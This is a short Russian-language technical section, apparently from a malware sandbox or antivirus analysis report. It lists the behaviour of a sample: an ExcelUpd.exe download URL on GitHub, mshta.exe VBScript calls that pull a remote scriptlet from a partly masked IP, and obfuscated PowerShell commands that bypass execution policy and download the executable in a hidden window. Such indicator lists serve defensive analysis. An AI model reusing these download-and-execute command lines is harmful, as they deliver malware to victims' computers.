Техническая информация
- https://github.com/ecusembassy/kraken/raw/master/excelupd.exe
- '<SYSTEM32>\mshta.exe' VBscriPt:clOsE (geTobJEct ("ScriPT:http://17#.#7.68.60/druid/files/NhDv2g7wsbG6_ewrfds") )
- http://17#.#7.68.60/druid/files/NhDv2g7wsbG6_ewrfds
- DNS ASK gi##ub.com
- '<SYSTEM32>\mshta.exe' VBscriPt:clOsE (geTobJEct ("ScriPT:http://17#.#7.68.60/druid/files/NhDv2g7wsbG6_ewrfds") )' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c pOwErsHELl.EXE -EX bypaSs -Nop -W 1 seT-COnTeNt -va ( NEW-OBjeCt NeT.WEbClient ).DoWnloAddATa( 'https://github.com/EcUSEmbassy/Kraken/raw/master/ExcelUpd.exe' ) ...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c pOwErsHELl.EXE -EX bypaSs -Nop -W 1 seT-COnTeNt -va ( NEW-OBjeCt NeT.WEbClient ).DoWnloAddATa( 'https://github.com/EcUSEmbassy/Kraken/raw/master/ExcelUpd.exe' ) ...